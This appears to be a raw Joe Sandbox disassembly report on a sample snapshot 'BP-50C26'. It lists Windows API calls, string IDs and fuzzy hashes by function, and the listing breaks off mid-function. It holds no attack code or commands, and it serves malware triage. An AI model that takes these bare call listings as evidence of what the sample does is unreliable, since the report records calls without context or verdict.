                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C7369C
                                                                                      • _wcslen.LIBCMT ref: 00C736A7
                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C73797
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C7380C
                                                                                      • GetDlgCtrlID.USER32(?), ref: 00C7385D
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C73882
                                                                                      • GetParent.USER32(?), ref: 00C738A0
                                                                                      • ScreenToClient.USER32(00000000), ref: 00C738A7
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C73921
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00C7395D
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                      • String ID: %s%u
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C74994
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00C749DA
                                                                                      • _wcslen.LIBCMT ref: 00C749EB
                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00C749F7
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C74A2C
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00C74A64
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00C74A9D
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00C74AE6
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C74B20
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C74B8B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                      • String ID: ThumbnailClass
                                                                                      • API String ID: 1311036022-1241985126
                                                                                      • Opcode ID: 60d24ff43651c953b116a5d489f9fc96675b3c83395e0c31d57320a2e98f84bb
                                                                                      • Instruction ID: e6ec6619e052fbc965b7fa7ed5db851164746e3ff46e20486ff06b0be274f062
                                                                                      • Opcode Fuzzy Hash: 60d24ff43651c953b116a5d489f9fc96675b3c83395e0c31d57320a2e98f84bb
                                                                                      • Instruction Fuzzy Hash: 3791DE311042059FDB09DF14C985FAAB7E8FF84314F04C46AFD999A096EB30EE45DBA1
                                                                                      APIs
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CA8D5A
                                                                                      • GetFocus.USER32 ref: 00CA8D6A
                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00CA8D75
                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00CA8E1D
                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CA8ECF
                                                                                      • GetMenuItemCount.USER32(?), ref: 00CA8EEC
                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00CA8EFC
                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CA8F2E
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CA8F70
                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CA8FA1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                      • String ID: 0
                                                                                      • API String ID: 1026556194-4108050209
                                                                                      • Opcode ID: fc805d156a3ee18ae7b113ec75821b7dca3f19930ff05fa6ed952c282355e11b
                                                                                      • Instruction ID: 68bbc0b8dedad7e12538f47700ab01f451cb612ba018eb80804f8faed442975b
                                                                                      • Opcode Fuzzy Hash: fc805d156a3ee18ae7b113ec75821b7dca3f19930ff05fa6ed952c282355e11b
                                                                                      • Instruction Fuzzy Hash: A481B0715083029FDB20CF64DC84AABBBE9FF8A358F04091DF99597291DB70DA08DB61
                                                                                      APIs
                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C7DC20
                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C7DC46
                                                                                      • _wcslen.LIBCMT ref: 00C7DC50
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C7DCA0
                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C7DCBC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                      • API String ID: 1939486746-1459072770
                                                                                      • Opcode ID: 71fcaa07087160e971dd579cd79570bef7699a18cd93877e2e3dce39ffb7a52d
                                                                                      • Instruction ID: 11d27227d96f38d44d04d60819b6e654f3935f8b992792ec7c207d9a34dd746d
                                                                                      • Opcode Fuzzy Hash: 71fcaa07087160e971dd579cd79570bef7699a18cd93877e2e3dce39ffb7a52d
                                                                                      • Instruction Fuzzy Hash: AB4140329002157ADB15AB64AC87FFF37BCEF56710F10407AFA05A2182EB719A01A7B4
                                                                                      APIs
                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C9CC64
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C9CC8D
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C9CD48
                                                                                        • Part of subcall function 00C9CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C9CCAA
                                                                                        • Part of subcall function 00C9CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C9CCBD
                                                                                        • Part of subcall function 00C9CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C9CCCF
                                                                                        • Part of subcall function 00C9CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C9CD05
                                                                                        • Part of subcall function 00C9CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C9CD28
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C9CCF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      • API String ID: 2734957052-4033151799
                                                                                      • Opcode ID: 6722d6172f1897dbd40edaefc16621697a5eaef7f66158883e1b421975253819
                                                                                      • Instruction ID: a905bf10e1819524fcdea12ec4d076c2d4db75ed44ab4519549080ccba34fb3a
                                                                                      • Opcode Fuzzy Hash: 6722d6172f1897dbd40edaefc16621697a5eaef7f66158883e1b421975253819
                                                                                      • Instruction Fuzzy Hash: 33315A72A01129BBDB208B95DCCCFFFBB7CEF46754F000165E916E3240DA349A45AAA0
                                                                                      APIs
                                                                                      • timeGetTime.WINMM ref: 00C7E6B4
                                                                                        • Part of subcall function 00C2E551: timeGetTime.WINMM(?,?,00C7E6D4), ref: 00C2E555
                                                                                      • Sleep.KERNEL32(0000000A), ref: 00C7E6E1
                                                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00C7E705
                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C7E727
                                                                                      • SetActiveWindow.USER32 ref: 00C7E746
                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C7E754
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C7E773
                                                                                      • Sleep.KERNEL32(000000FA), ref: 00C7E77E
                                                                                      • IsWindow.USER32 ref: 00C7E78A
                                                                                      • EndDialog.USER32(00000000), ref: 00C7E79B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                      • String ID: BUTTON
                                                                                      • API String ID: 1194449130-3405671355
                                                                                      • Opcode ID: 8a54efd2d907f33047ea16b0b064b2578400f35fe1fe094da5b3de1a18dec356
                                                                                      • Instruction ID: 2a3e38cae76345f5b234d2deb4d795bcd7507f94f76381b4705683ee6376d165
                                                                                      • Opcode Fuzzy Hash: 8a54efd2d907f33047ea16b0b064b2578400f35fe1fe094da5b3de1a18dec356
                                                                                      • Instruction Fuzzy Hash: D1218172200685AFEB009F64ECC9B2D3B6DF75A34DB109465F919C61B1DBB1AD10AB24
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C7EA5D
                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C7EA73
                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7EA84
                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C7EA96
                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C7EAA7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: SendString$_wcslen
                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                      • API String ID: 2420728520-1007645807
                                                                                      • Opcode ID: 7d1b4821a7bed87c5ff4bbbcc6775545d93575b04e488d853cd70461ea6d1f3a
                                                                                      • Instruction ID: a7c514e042fcbb74b104ea568616d60112e44c5bc082ac0512481c69173079a7
                                                                                      • Opcode Fuzzy Hash: 7d1b4821a7bed87c5ff4bbbcc6775545d93575b04e488d853cd70461ea6d1f3a
                                                                                      • Instruction Fuzzy Hash: 6111A331A9026979D720E7A1DC5AEFF6B7CFBD6B10F40043AB911A21D0EE701A45E5B0
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00C75CE2
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C75CFB
                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C75D59
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00C75D69
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C75D7B
                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C75DCF
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C75DDD
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C75DEF
                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C75E31
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00C75E44
                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C75E5A
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00C75E67
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                      • String ID:
                                                                                      • API String ID: 3096461208-0
                                                                                      • Opcode ID: 345eae9145b27f7177b5678c9ae203741df98884f4669f71539e27a0cb0fedd2
                                                                                      • Instruction ID: 7bf9606649955f02c433e94f2a2befbd22d74fcae37cf4c208012aa9e3fe7c3b
                                                                                      • Opcode Fuzzy Hash: 345eae9145b27f7177b5678c9ae203741df98884f4669f71539e27a0cb0fedd2
                                                                                      • Instruction Fuzzy Hash: 4751FCB1A00609AFDB18CF68DD89BAEBBB5FB48304F148129F919E7290D7709E04CB50
                                                                                      APIs
                                                                                        • Part of subcall function 00C28F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C28BE8,?,00000000,?,?,?,?,00C28BBA,00000000,?), ref: 00C28FC5
                                                                                      • DestroyWindow.USER32(?), ref: 00C28C81
                                                                                      • KillTimer.USER32(00000000,?,?,?,?,00C28BBA,00000000,?), ref: 00C28D1B
                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00C66973
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00C28BBA,00000000,?), ref: 00C669A1
                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00C28BBA,00000000,?), ref: 00C669B8
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C28BBA,00000000), ref: 00C669D4
                                                                                      • DeleteObject.GDI32(00000000), ref: 00C669E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                      • String ID:
                                                                                      • API String ID: 641708696-0
                                                                                      • Opcode ID: 878d2236889c28def3ee0062efcce7198f7d29a820c5d6a395cb46c4ec2c65c8
                                                                                      • Instruction ID: e275035b53e19a08f8c6f69369cb69bdfdb41530ead4e55965608bf09897142d
                                                                                      • Opcode Fuzzy Hash: 878d2236889c28def3ee0062efcce7198f7d29a820c5d6a395cb46c4ec2c65c8
                                                                                      • Instruction Fuzzy Hash: 1F61DE31102660DFCB319F15EA88B2DB7F1FB41316F18451CE4529B9A1CB35AEA8DF90
                                                                                      APIs
                                                                                        • Part of subcall function 00C29944: GetWindowLongW.USER32(?,000000EB), ref: 00C29952
                                                                                      • GetSysColor.USER32(0000000F), ref: 00C29862
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ColorLongWindow
                                                                                      • String ID:
                                                                                      • API String ID: 259745315-0
                                                                                      • Opcode ID: 74e8f57b13ea6391be7c2063f9e78262124b49dcac3a33a3daa460d5b5abd0eb
                                                                                      • Instruction ID: c4b058898274c53da6d7692891be58e32671e8e4c34b0520e5c188438fd015d9
                                                                                      • Opcode Fuzzy Hash: 74e8f57b13ea6391be7c2063f9e78262124b49dcac3a33a3daa460d5b5abd0eb
                                                                                      • Instruction Fuzzy Hash: 42418031504650AFDB249F38AC88BBD3BA5EB17334F184655FAB68B2E1D7319D42DB10
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00C5F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00C79717
                                                                                      • LoadStringW.USER32(00000000,?,00C5F7F8,00000001), ref: 00C79720
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00C5F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00C79742
                                                                                      • LoadStringW.USER32(00000000,?,00C5F7F8,00000001), ref: 00C79745
                                                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00C79866
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                      • API String ID: 747408836-2268648507
                                                                                      • Opcode ID: ff779653beb36c98f9d5c8809b20bc9437a75815ec8feaba4c82d4392a2f6ee5
                                                                                      • Instruction ID: 5df18d39f75666573171133f81256eeee682000752cd680f28badc681bb8546d
                                                                                      • Opcode Fuzzy Hash: ff779653beb36c98f9d5c8809b20bc9437a75815ec8feaba4c82d4392a2f6ee5
                                                                                      • Instruction Fuzzy Hash: BA415371800109AADB04EBD0CD96EEE7778EF56344F504025F605720A1EB356F89EB61
                                                                                      APIs
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C707A2
                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C707BE
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C707DA
                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C70804
                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C7082C
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C70837
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C7083C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                      • API String ID: 323675364-22481851
                                                                                      • Opcode ID: b94a83fd571a687d4e8da71ac219e29798f64014874275ca99f4ccdb46c5273e
                                                                                      • Instruction ID: 49098b4d2aa2fddd8ca0137db67d7b47b794ac9d87ad3d316560e9afd4556b4c
                                                                                      • Opcode Fuzzy Hash: b94a83fd571a687d4e8da71ac219e29798f64014874275ca99f4ccdb46c5273e
                                                                                      • Instruction Fuzzy Hash: 65413872C10228EBDF15EBA4DC95DEDB778FF05354F14412AE915A31A0EB30AE45EBA0
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 00C93C5C
                                                                                      • CoInitialize.OLE32(00000000), ref: 00C93C8A
                                                                                      • CoUninitialize.OLE32 ref: 00C93C94
                                                                                      • _wcslen.LIBCMT ref: 00C93D2D
                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00C93DB1
                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C93ED5
                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C93F0E
                                                                                      • CoGetObject.OLE32(?,00000000,00CAFB98,?), ref: 00C93F2D
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00C93F40
                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C93FC4
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C93FD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 429561992-0
                                                                                      • Opcode ID: 01f840746c1dbae1b0c6bc7b8ad4e9145ecd7a194db7e422ca5fcded27130512
                                                                                      • Instruction ID: 72d81d80778eb961253ffd01371ee3c4760cf889bb47a747c3a6247f8db6d95b
                                                                                      • Opcode Fuzzy Hash: 01f840746c1dbae1b0c6bc7b8ad4e9145ecd7a194db7e422ca5fcded27130512
                                                                                      • Instruction Fuzzy Hash: 02C146716083459FDB00DF68C88892BB7E9FF89748F10495DF99A9B250DB30EE45CB52
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 00C87AF3
                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C87B8F
                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00C87BA3
                                                                                      • CoCreateInstance.OLE32(00CAFD08,00000000,00000001,00CD6E6C,?), ref: 00C87BEF
                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C87C74
                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00C87CCC
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00C87D57
